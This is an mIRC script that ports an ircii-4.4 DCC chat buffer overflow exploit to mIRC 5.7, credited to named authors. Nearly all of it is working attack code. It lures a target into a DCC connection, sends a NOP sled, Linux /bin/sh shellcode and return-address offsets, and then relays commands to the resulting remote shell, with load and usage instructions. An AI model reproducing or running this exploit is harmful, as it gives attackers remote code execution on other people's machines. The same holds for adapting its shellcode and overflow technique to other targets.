; ide_expl.mrc: vade79 -> _v9[v9@fakehalo.org], www.fakehalo.org. ; ; ircii-4-4 exploit->ported to mirc5.7, works reverse to ircii-4.4.c. You send the chat ; request instead of having them chat you, result is the same. ; ; Wrote directly from ircii-4.4.c(for *nix), that someone gave me to port to mirc. ; ; Exploit to overflow a buffer. Although, more often than not it will crash/seg fault ; with both versions of this exploit, by default offsets. (exploit noted as being for ; V4.4, and patched in V4.4M) ; ; ircii-4.4.c by: bladi & aLmUDeNa. ; ide_expl.mrc(this) by: _v9(vade79). ; ; Also included in the exploit(ircii4.4.c) were some other offsets: ; ; "SuSe 6.x :0xbfffe3ff" ; "RedHat :0xbfffe888" ; ; To load this script into mIRC5.7: /load -rs ; ; NOTE: While making this i noticed /sockwrite had some problems catching up on checking to see if ; the connection still exists, so if you see a /sockwrite error in the status window, the user ; probably seg faulted. alias -l bin { if ($len($1) != 2) { return } var %i, %j, %k if ($left($1,1) !isnum) { %i = $calc($asc($left($1,1)) -87)) } else { %i = $left($1,1) } if ($right($1,1) !isnum) { %j = $calc($asc($right($1,1)) -87)) } else { %j = $right($1,1) } while (%i) { %k = %k + 16 | dec %i } return $calc(%k + %j) } alias -l make_string { var %i = 1, %j while ($gettok($replace($1,\x,\),0,92) >= %i) { %j = %j $bin($gettok($replace($1,\x,\),%i,92)) inc %i } return %j } alias -l wn return @ircii4.4_dcc_exploit alias -l sw { if ($2) { if ($sock(exp_ide).status != active) { if ($window($wn)) { window -c $wn } echo -a Connection lost/non-existant. ( $+ %ide.status $+ ) } else { if ($window($wn)) { titlebar $wn $chr(91) data sent to socket(last): $1- $chr(93) } sockwrite $1- } } } alias -l main { if ($window($wn)) { window -c $wn } | window -aek $wn echo $wn *** [01]: sending DCC chat request, waiting... set %ide.nick $1 | set %ide.port $rand(1024,4096) while ($portfree(%ide.port) != $true) { set %ide.port $rand(1024,4096) } sockclose exp_ide_base | socklisten exp_ide_base %ide.port .quote privmsg $1 : $+ $chr(1) $+ DCC CHAT chat $longip($ip) %ide.port $+ $chr(1) } alias exploit_ircii { if ($server) { if ($window($wn)) { echo -a *** Close the exploit window before attempting to exploit. | halt } elseif ($version < 5.7) { echo -a *** Functions in this script require mIRC5.7 or greater. (aborted) | halt } elseif ($1) { main $1 } else { echo -a Syntax: /exploit_ircii } } } on 1:SOCKREAD:exp_ide: { if ($sockerr > 0) return :read sockread %data if ($sockbr == 0) return if (%data == $null) var %data = (no data) if ($window($wn)) { echo $wn -> %data } goto read } on 1:SOCKLISTEN:exp_ide_base: { sockclose exp_ide | sockaccept exp_ide | sockclose exp_ide_base unset %ide.status if ($window($wn)) { set %ide.status 0 echo $wn *** [02]: connected, setting up binary variables. (nops/shell code/etc) bset &nops 1 $make_string(\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90) bset &o 1 $make_string(\xff\xbf\xff\xe3) ; ^- try different offsets here. bset &shellcode 1 $make_string(\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff) bset -t &shellcode $calc($bvar(&shellcode,0) +1) /bin/sh echo $wn *** [03]: attempting to overflow buffer, sending the variables. (nops/shell code/etc) inc %ide.status echo $wn *** [--]: * (1/4) sending the nops, looping 47 times. var %i = 0 while (%i < 47) { sw exp_ide &nops inc %i } inc %ide.status echo $wn *** [--]: * (2/4) sent, now sending the shell code. sw exp_ide &shellcode %i = 0 | while (%i < 9999) { inc %i } inc %ide.status echo $wn *** [--]: * (3/4) sent, now waiting/continuing, looping 299 times. %i = 0 while (%i < 299) { var %j = 0 | while (%j < 499) { inc %j } var %j = 1 while ($bvar(&o,%j)) { bset &bit 1 $bvar(&o,%j) sw exp_ide &bit inc %j } inc %i } inc %ide.status echo $wn *** [--]: * (4/4) sent, done. } else { sockclose exp_ide } } on 1:SOCKCLOSE:exp_ide: { if ($window($wn)) { window -c $wn } echo -a *** Connection lost with %ide.nick $+ . ( $+ %ide.status $+ ) unset %ide.* } on 1:CLOSE:@: { if ($target == $wn) { if ($sock(exp_ide)) { sockclose exp_ide } if ($sock(exp_ide_base)) { sockclose exp_ide_base } unset %ide.* } } on 1:INPUT:@: { if ($active == $wn) { if ($sock(exp_ide).status == active) { if (%ide.status != 4) { echo *** Error, status is not at 4 yet, wait for completion. } else { echo $wn <- $1- | sw -n exp_ide $1- } } else { echo $wn *** Error, socket status isn't online yet. } halt } } on 1:LOAD: { if ($version < 5.7) { echo -a *** Functions in this script( $+ $nopath($script) $+ ) require mIRC5.7 or greater. (aborted) | .unload -rs $script | halt } else { echo -a *** Loaded $nopath($script) $+ , syntax is: /exploit_ircii . } }

��ŷ��